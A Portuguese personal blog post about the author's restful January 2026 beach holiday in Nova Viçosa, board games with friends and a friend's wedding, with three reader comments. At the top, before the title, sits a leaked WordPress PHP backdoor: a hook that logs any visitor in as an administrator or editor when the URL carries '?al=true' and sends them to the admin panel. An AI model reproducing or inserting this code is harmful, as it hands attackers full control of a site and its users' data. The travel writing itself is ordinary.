// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Janeiro 2026 - Começando o ano com calmaria • A Menina da Janela

pessoalviagens

6 de abril de 2026

Depois do caos que foi dezembro – um caos muito bom, mas ainda assim, cansativo – eu defini que janeiro seria meu mês de férias. Isso é algo que como autônoma preciso aprender – desde 2022, quando saí da faculdade e do estágio, eu não tirava um mês inteiro de férias, e basicamente eu sou a pessoa que precisa se organizar pra que isso aconteça. É a coisa mais fácil do mundo? Não. Mas eu nem consigo colocar me palavras o tanto que eu precisava disso.

Comecei o mês em Nova Viçosa, naquele ritmo que já me é comum há alguns anos quando estamos por lá: acordar cedo, ir pra praia, voltar pra casa, almoçar, cochilar na varanda de tarde, voltar pra praia quando o Sol deixa, ver o pôr-do-Sol, voltar pra casa, tomar banho e arrumar pra passear na cidade a noite. Eu acho que esse ritmo pré-definido e repetitivo é uma das coisas que mais me ajuda a relaxar por lá.

Logo no começo do ano a Lua ficou cheia, e ficamos até mais tarde na praia nesses dias vendo a lua subir de um lado enquanto o sol descia do outro – outra coisa que eu AMO ver em Nova Viçosa. Como a praia lá é virada pro Sul, o Sol se põe na lateral mar e eu sempre tenho menos fotos disso do que gostaria porque não tem experiência melhor do que ver esse momento de dentro da água – que parece ficar toda prateada.

Nesses dias o pessoal da casa também aproveitou a maré pra ficar jogando futebol na praia, e apesar de ODIAR futebol e qualquer esporte com bola, eu adoro ficar observando e curtindo a praia por mais tempo. Eu sou uma pessoa que AMA mar, e esse ano, depois de fazer natação o ano passado inteiro, sinto que consegui curtir até um pouquinho mais. Todos os dias, eu e Bibi íamos nadando entre dois pontos específicos da praia, como um exercício diário, porém gostoso que foi muito bem vindo também.

Outro evento anual da casa é o passeio de barco. Esse ano nos dividimos e o pessoal com criança fez um passeio mais curto, enquanto nós fomos passar o dia inteiro na Reserva Extrativista de Cassurubá – uma ilha no meio do mar e do mangue, quase deserta. É a segunda vez que vamos pra lá e é sempre uma experiência muito legal.

Nós sempre jogamos muito em Nova Viçosa, e não seria diferente na vez que Ian e Bibi – nossos companheiros de jogos de tabuleiro – foram com a gente pra viagem, né? Pra completar a alegria, abriu um bar de jogos lá na cidade, então juntamos com alguns outros amigos e primos do João e passamos algumas horas lá jogando. Teve também muitas horas jogadas de bozó, presidente e outros jogos de baralho, general, adedanha, África, e os meninos se arriscaram até a jogar mahjong – a turminha do João e amigos do primo dele que estão estudando mandarim, porque nesse eu não me arrisquei.

Eu e Bibi curtimos muito também nossos rolês sozinhas – que variaram de sair pra tomar uma caipirinha de tarde juntas, a nadar, ir numa loja esotérica fazer leitura de mão e passar algumas horas nas lojinhas de acessórios da cidade – e vivemos muito uma viagem de amigas, com direito a tererê combinando e tudo. Eles foram embora alguns dias antes da gente, mas antes saímos de noite pra comer uma moqueca que estava deliciosa também. Depois disso foram alguns dias mais quietinha com o João, curtindo os últimos dias de praia.

O horizonte torto é parte do charme (já aceitei que as fotos do João saem assim kkkkk)

No dia 11 fomos embora, e eu sempre odeio me despedir do mar – eu realmente amo ficar dentro da água por horas e horas, brincando, nadando ou só existindo enquanto sinto o movimento das ondas, e odeio ter que voltar e ficar sem saber quando vou viver isso de novo. Mas pra honrar o título de “povo que gosta de viajar”, a gente não voltou direto pra casa: demos uma paradinha em Viçosa, na casa dos tios do João (que estavam lá na praia com a gente também), e passamos uns dias lá.

Por fim, chegou a hora de voltar pra casa de verdade, e retomar a rotina (ainda sem trabalho). Natação, pilates, e tempo pra hobbies. Consegui me manter quase 100% sem trabalhar – com exceção de algumas reuniões com clientes que eram necessárias. Essa foi a parte mais difícil: estar em BH e me controlar pra não trabalhar, mas consegui passar o mês bem tranquilo.

Pra fechar o mês, fiz uma aula do Medita & Aquarela, da Águas da Karla, e adorei a aula e o resultado da pintura. Voltando da natação num dia qualquer, encontrei esses gatinhos em um lote vago e quase derreti de amor – queria muito ter como trazer pra casa, mas não podia. Pouco tempo depois, vi no grupo do bairro que eles foram resgatados. E no último dia do mês foi dia de voltar ao trabalho – fui fotografar o casamento do Arthur e da Cecília, amigos da época do ensino médio. Foi lindíssimo o casamento e ainda voltei com esse buquê pra casa – todas as flores da decoração foram transformadas em buquês e distribuídas pros convidados <3.

Bom, esse foi o meu mês – com só um pouquinho de atraso, né?

Me contem como foi o começo do ano por aí!

Abraços,
e até mais!

Você também vai gostar

    Dezembro – Brasília, Bahia… SOCORRO JÁ É ABRIL???
    Metas para 2026 #WoA

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Este site utiliza o Akismet para reduzir spam. Saiba como seus dados em comentários são processados.

3 Comments

  • Claudia Hi

    Que delícia de mês Laura!Que bom que você conseguiu não só se organizar, mas se permitir ter um mês inteirinho de descanso. Ouvi dizer que a gente só consegue se desligar totalmente do trabalho depois de 15 dias. Então acho que só assim mesmo pra conseguir descansar de verdade.

    Eu adoro como você tá sempre se reunindo com seus amigos e jogando algo. Acho muito mais legal do que ficar só conversando rs

    Achei essa ideia de fazer buquês pro convidados super legal, já que no fim vai ser perdido mesmo. Pelo menos todo mundo aproveita um pouquinho mais as flores.

    Meu começo do ano foi voltar de viagem pra Minas, onde sempre passo o ano novo. Mas depois disso já foi voltar pra rotina. Bem sem graça rs

  • Bruna Both

    Oi Laura!

    Que bacana você ter conseguido tirar férias, ainda mais num lugar tão maravilhoso como esse.

    Eu não suporto a ideia da gente trabalhar um ano todo e tirar dias pra descansar pra se sentir si mesma uma vez só no ano. Me pareceu que aí não foi esse caso, foram momentos em família e amigos, que dão aquele quentinho no coração.

    Adorei tuas fotos!

    Abração
    https://falacatarina.com/blog/

  • Luly Lage

    A sua aquarela ficou uma coisinha linda demais, amei!
    Que bom que você conseguiu tirar férias nesse mês praticamente todo… É difícil, isso, mas essencial demais, né? As fotos da praia ficaram incríveis, inclusive a paisagem tortinha do João, eu sou igual a ele, hahahaha!